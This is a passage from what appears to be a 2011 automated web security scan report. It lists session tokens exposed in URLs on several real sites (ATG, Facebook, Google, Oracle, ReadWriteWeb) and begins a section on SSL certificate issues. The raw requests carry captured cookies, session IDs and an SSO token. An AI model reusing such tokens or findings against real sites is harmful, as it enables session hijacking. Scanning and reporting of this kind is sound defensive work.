Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:53:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:54 GMT
Content-Length: 27516
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>Request Passwor
...[SNIP]...
<li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+">Course Schedule</a>
...[SNIP]...

8.35. https://www.atg.com/en/register/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.atg.com
Path:   /en/register/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /en/register/ HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Expires: Tue, 06 Sep 2011 15:53:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:51 GMT
Content-Length: 43457
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
   <meta http-equiv="Content-type" content="text/html; charset=utf-8">
   
   <title>Register - ATG<
...[SNIP]...
<li class="bulleted"><a href="/en/products-services/education/schedule/?_DARGS=/includes/templates/content-one-column.jsp_AF&_dynSessConf=6188254392000198924&/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=true&/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=month&/atg/extrasite/training/TrainingScheduleFormHandler.months=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.submit=+&/atg/extrasite/training/TrainingScheduleFormHandler.title=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.title=+&/atg/extrasite/training/TrainingScheduleFormHandler.location=all&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.sortBy=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.location=+&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.criteriaSet=+&/atg/extrasite/training/TrainingScheduleFormHandler.submit=true&_D%3A/atg/extrasite/training/TrainingScheduleFormHandler.months=+">Course Schedule</a>
...[SNIP]...

8.36. https://www.atg.com/service/main.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.atg.com
Path:   /service/main.jsp

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: https://www.atg.com/service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLEV4dHJhc2l0ZS85LjEsSUFGLzkuMSxBQ08vOS4xLFNlcnZpY2UvOS4xLENBRi85LjEgWyBEUFNMaWNlbnNlLzAgQjJDTGljZW5zZS8wIFBvcnRhbExpY2Vuc2UvMCBTZWxmU2VydmljZUxpY2Vuc2UvMCAgXQ==
Location: http://www.atg.com/service/main.jsp?_dyncharset=UTF-8&_dynSessConf=6188254392000198924&t=searchTab&dosearch=true&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&searchstring=xss+faq+help&SearchButton=Find&focusTopic=&topicName=&useFocusTopic=true
Content-Language: 7cd9f92e1f6617753dfce39
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html;charset=UTF-8
Expires: Tue, 06 Sep 2011 15:53:05 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:53:05 GMT
Connection: keep-alive


8.37. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=57345927025&app_id=57345927025&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc60f4ba8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3cb50af8%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31d2c4284%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd66cbd98%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df273fd1124%26origin%3Dhttp%253A%252F%252Fwww.readwriteweb.com%252Ff27c152a9%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df1fd77541&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.255.53
X-Cnection: close
Date: Tue, 06 Sep 2011 15:32:51 GMT
Content-Length: 249

<script type="text/javascript">
parent.postMessage("cb=fd66cbd98&origin=http\u00253A\u00252F\u00252Fwww.readwriteweb.com\u00252Ff27c152a9&relation=parent&transport=postmessage&frame=f1fd77541", "http:
...[SNIP]...

8.38. http://www.google.com/search

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.google.com
Path:   /search

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /search?sourceid=chrome&ie=UTF-8&q=site%3Acnbc.com+JSESSIONID HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:13:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 102810

<!doctype html> <head> <title>site:cnbc.com JSESSIONID - Google Search</title> <script>window.google={kEI:"tDhmToK0BcfciAKMtYzGCg",getEI:function(a){var b;while(a&&!(a.getAttribute&&(b=a.getAtt
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&amp;phrase=Options+Action+Web+Extra" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=11B292CC4219086DCD47B8876891F233?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNLTGZaQXFDVDBtdg%3D%3D&phrase=Options+Action+Web+Extra','','','','1','','0CBoQFjAA')">Remove - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&amp;phrase=Investments+for+High+Net+Worth" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=985047FA11137241E01F938A1DBC0957?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TDh3OEdKUTFzcHVNQjV4d0dFQUt1Qg%3D%3D&phrase=Investments+for+High+Net+Worth','','','','2','','0CCAQFjAB')">Remove - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&amp;phrase=Fundraiser-in-Chief" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=B55B909145331242FF6DF4FCC879CCA8?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2TEZzaHhTUVJMMXJBTjlsbHRReGhoNQ%3D%3D&phrase=Fundraiser-in-Chief','','','','3','','0CCYQFjAC')">Remove - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&amp;phrase=Soft+Landing+or+Hard+Landing+for+China%3F" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=88BAFCA8CD8211717C40DEEB8444A8AC?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJ2TENPcEtyendEVg%3D%3D&phrase=Soft+Landing+or+Hard+Landing+for+China%3F','','','','4','','0CCwQFjAD')">Remove - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&amp;phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=F106A5792CA8BDD181F1F225115A4E13?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2THdhZHZIUEtZb1puTmkyTWhYMFhuQQ%3D%3D&phrase=Joint+EU-IMF+Aid+May+Not+Be+All+That+Great%3A+Analyst','','','','5','','0CDIQFjAE')">Remove - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&amp;phrase=Alcoa+Earnings+Reaction" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=639562A329F750EF6CECEF52850FF058?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SXFjd0pIdThwMTJySmQ3L2ZTZzAvVw%3D%3D&phrase=Alcoa+Earnings+Reaction','','','','6','','0CDgQFjAF')">Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&amp;phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_remove.action;jsessionid=DED5E23C761652B8ED8438990C240549?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2SzFCSUt5TFNSMjNORFcrYURhWDhlZg%3D%3D&phrase=Talking+Numbers%3A+Cashing+in+on+the+Consumer','','','','7','','0CD4QFjAG')">Remove - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&amp;phrase=Muni+Bonds%3A+Time+to+Buy%3F&amp;page=0" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=0B47155A9D65A891A3246272A37765AB?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFowbVo5SHJOcUVudA%3D%3D&phrase=Muni+Bonds%3A+Time+to+Buy%3F&page=0','','','','8','','0CEQQFjAH')">Add to Cart - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&amp;phrase=Eye+on+Europe&#39;s+Economy&amp;page=1" class=l onmousedown="return clk(this,'http://videoreprints.cnbc.com/cart_add.action;jsessionid=93C40ADFE94CC07D57F86DD9E23EF04B?parms=Vy9xQitlTG9McWxHNGo3Q0tVdi8rMitMd0c0WVorMnJZbkdoWHhESks2S2k1S2NoS0pSeFovUEJVWjFZZG42YQ%3D%3D&phrase=Eye+on+Europe\'s+Economy&page=1','','','','9','','0CEoQFjAI')">Add to Cart - Shopping Cart</a>
...[SNIP]...
<h3 class="r"><a href="http://videoreprints.cnbc.com/search.action;jsessionid=B2F5063C1050C7893BD8840513A5ABB2?phrase=Commodity+Price+Check" class=l onmousedown="return clk(this,this.href,'','','','10','','0CFAQFjAJ')">Clips about Commodity Price Check - Video Reprints - CNBC.com</a>
...[SNIP]...

8.39. http://www.oracle.com/us/technologies/virtualization/index.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /us/technologies/virtualization/index.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /us/technologies/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35997532225678913,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<li>Video: <a href="http://event.on24.com/view/presentation/flash/EventConsoleMVC.html?titlecolor=000000&amp;simulive=y&amp;eventid=230989&amp;sessionid=1&amp;username=&amp;partnerref=ocomvirtbanner&amp;format=fhaudio&amp;key=A6199BFA52B30C22E040FB8EC497CF7A&amp;text_language_id=en&amp;playerwidth=793&amp;playerheight=597&amp;overwritelobby=y&amp;eventuserid=39776441&amp;contenttype=A&amp;mediametricsessionid=39052776&amp;mediametricid=597453&amp;usercd=39776441&amp;mode=launch#">Virtualization Trends: What You Need to Know Now</a>
...[SNIP]...

8.40. http://www.oracle.com/webapps/dialogue/dlgpage.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /webapps/dialogue/dlgpage.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /webapps/dialogue/dlgpage.jsp HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 971

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Redirect to Oracle SSO Server</TITLE>
</HEAD><BODY>
<H1>Redirect to Oracle SSO Server</H1>
The document has moved <A HREF="https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~DCB6E02A~B3964784C5615CAD86A19B08BF003E6DC1F9608040BDF71E29E49932950A1B71EFD31C6D4ED695B243FDE803DC9F2F55D0F20DD8EDA5E3FEA77DC2E93718C93EC29671EA3C14F971452EC6D61EF6CE183837F77FC5F6491FF8AD315A04A52ECF56F98862CDF325352E80FE6C5A0E4F0305E98BC37A96999294A92A1317DD843024F5D0FDE0B2C2915AD8952D45EAF896566BABB64DBDA7096215ADAB74B74EDF954EC9163D472530757E1CD4FE203426DEA77A06FFF4F747A57E476D43954406724B9FD349DE1A3353C21B0752F164CF">here</A>
...[SNIP]...

8.41. http://www.readwriteweb.com/%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.readwriteweb.com
Path:   /%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /%22http://rww.readwriteweb.netdna-cdn.com/assets_c/2009/06/oralogo_june09-thumb-150x20-5948.gif/%22 HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:32:49 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT
ETag: "8f7c-48f20ec4c6e40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 36732
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"></script>
...[SNIP]...

8.42. http://www.readwriteweb.com/404.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.readwriteweb.com
Path:   /404.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /404.html HTTP/1.1
Host: www.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0; __qca=P0-110430846-1315341155951; __qseg=Q_D; _fm_bizo=bizo%3Dindustry-business_services%2Clocation-texas%3B; PHPSESSID=uu8u8il3haqs9qituee6bsgku7

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.x (Hardened)
Last-Modified: Tue, 31 Aug 2010 16:17:53 GMT
ETag: "8f7c-48f20ec4c6e40"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Length: 36732
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

...[SNIP]...
</script>
<script id="aptureScript" type="text/javascript" src="http://www.apture.com/js/apture.js?siteToken=H0arRY0" charset="utf-8"></script>
...[SNIP]...

9. SSL certificate
There are 22 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://account.bigcommerce.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://account.bigcommerce.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.bigcommerce.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 07 18:00:00 GMT-06:00 2009
Valid to:  Tue Dec 11 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 18:00:00 GMT-06:00 2007
Valid to:  Sat Apr 02 18:00:00 GMT-06:00 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sat Sep 30 23:00:00 GMT-06:00 2006
Valid to:  Sat Jul 26 12:15:15 GMT-06:00 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
